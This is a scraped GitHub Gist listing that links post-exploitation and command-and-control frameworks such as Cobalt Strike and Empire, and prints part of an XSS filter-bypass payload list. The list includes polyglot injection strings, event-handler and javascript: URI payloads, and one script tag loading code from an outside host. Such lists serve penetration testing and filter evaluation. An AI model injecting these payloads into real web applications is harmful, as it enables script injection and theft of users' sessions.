Skip to content

Instantly share code, notes, and snippets.

@albertzsigovits
albertzsigovits / postexploit.txt
Created October 11, 2023 19:02
Post-exploit tools
Commercial tools:
Cobalt Strike - https://www.cobaltstrike.com/
Brute Ratel C4 - https://bruteratel.com/
Nighthawk - https://www.mdsec.co.uk/nighthawk/
Outflank Security Tooling (OST) - https://outflank.nl/services/outflank-security-tooling/
Metasploit - https://www.metasploit.com/
Open-source tools:
Posh C2 - https://github.com/nettitude/PoshC2
Empire - https://github.com/BC-SECURITY/Empire
@muff-in
muff-in / resources.md
Last active July 18, 2024 01:30
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active July 21, 2024 22:26
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>